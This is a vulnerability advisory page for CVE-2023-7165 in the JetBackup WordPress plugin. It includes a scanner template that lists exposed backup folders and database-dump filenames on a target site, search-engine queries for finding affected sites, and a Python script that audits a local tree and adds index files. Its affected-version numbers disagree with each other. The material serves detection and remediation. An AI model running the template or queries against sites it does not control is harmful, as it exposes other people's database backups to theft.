
JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing

CVE-2023-7165
Verified

Description

The JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files; exploitation requires access to the web server.

Severity

High

CVSS Score

7.5

Exploit Probability

32%

Affected Product

jetbackup

Published Date

April 9, 2026

Template Author

pussycat0x

CVE-2023-7165.yaml
id: CVE-2023-7165

info:
  name: JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing
  author: pussycat0x
  severity: high
  description: |
    JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server.
  impact: |
    Attackers can access and leak sensitive backup files, potentially leading to data exposure and security breaches.
  remediation: |
    Update to version 2.0.9.9 or later that implements index files to prevent directory listing.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing
    - https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/
    - https://plugins.trac.wordpress.org/changeset/3016772/backup
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7165
    cwe-id: CWE-548
    cpe: cpe:2.3:a:developer177:jetbackup:*:*:*:*:*:wordpress:*:*
    epss-score: 0.31581
    epss-percentile: 0.96857
  metadata:
    verified: true
    max-request: 2
    vendor: jetbackup
    product: jetbackup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/backup/"
    fofa-query: body="/wp-content/plugins/backup/"
    google-query: inurl:"/wp-content/uploads/jetbackup/"
    shodan-query: http.html:"/wp-content/plugins/backup/"
  tags: cve,cve2023,wordpress,wp-plugin,jetbackup,wp,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of","jetbackup")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: folder_name
        part: body
        group: 1
        regex:
          - 'href="([^"]*_D\d{14}[^"]*)/"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/{{folder_name}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, ".sgbp")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: database_dump
        part: body
        group: 1
        regex:
          - 'href="([^"]+_database\.sql)"'
        internal: true
# digest: 490a00463044022007b439f85bed4bd0d96c6d92d8d32bd90e9db5b5c8b455473d6fc487608c7be9022025663489e718dde669b78698640ebc320b0d14a6913d1574640427f34af13f6d:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2023-7165
CWE ID: CWE-548

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing
https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/
https://plugins.trac.wordpress.org/changeset/3016772/backup

Remediation Steps

Update to version 2.0.9.9 or later, which implements index files to prevent directory listing.
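Added example, not JetBackup's or the template's own code: an offline audit of the plugin's upload tree that flags directories with no index file (the condition the template detects over HTTP) and applies the index-file fix the remediation describes. The directory and file names are constructed to match the template's extractor patterns (`_D` plus 14 digits, `.sgbp`, `_database.sql`); the real tree lives under the site's `wp-content/uploads/jetbackup/`.

```python
"""Offline audit of a JetBackup upload tree for directories without an index
file (CVE-2023-7165), plus the index-file fix. Constructed sample data."""
import os
import re
import tempfile

INDEX_FILES = {"index.php", "index.html", "index.htm"}
# Backup artefacts named as the template's extractors expect.
SENSITIVE_RE = re.compile(r"(\.sgbp|_database\.sql)$")

def audit_backup_tree(root):
    """Map each directory under root lacking an index file (relative path,
    '.' for root) to the sensitive files a server-side listing would show."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if set(files) & INDEX_FILES:
            continue  # the server returns the index file, not a listing
        rel = os.path.relpath(dirpath, root)
        findings[rel] = sorted(f for f in files if SENSITIVE_RE.search(f))
    return findings

def add_index_files(root):
    """Write an empty index.php into every directory lacking one and return
    the created paths. This stops listings only; a file whose name is
    already known stays downloadable unless the web server blocks it."""
    created = []
    for dirpath, _dirs, files in os.walk(root):
        if set(files) & INDEX_FILES:
            continue
        path = os.path.join(dirpath, "index.php")
        with open(path, "w") as fh:
            fh.write("<?php\n// Silence is golden.\n")  # WordPress convention
        created.append(path)
    return created

def build_sample_tree():
    """Constructed layout: one backup folder with a _D<14 digits> suffix."""
    root = tempfile.mkdtemp(prefix="jetbackup_")
    site = os.path.join(root, "example_D20240101120000")
    os.makedirs(site)
    for name in ("example_database.sql", "example.sgbp", "readme.txt"):
        open(os.path.join(site, name), "w").close()
    return root

if __name__ == "__main__":
    root = build_sample_tree()
    print(audit_backup_tree(root))  # '.' and the backup folder are flagged
    add_index_files(root)
    print(audit_backup_tree(root))  # {} once index files are in place
```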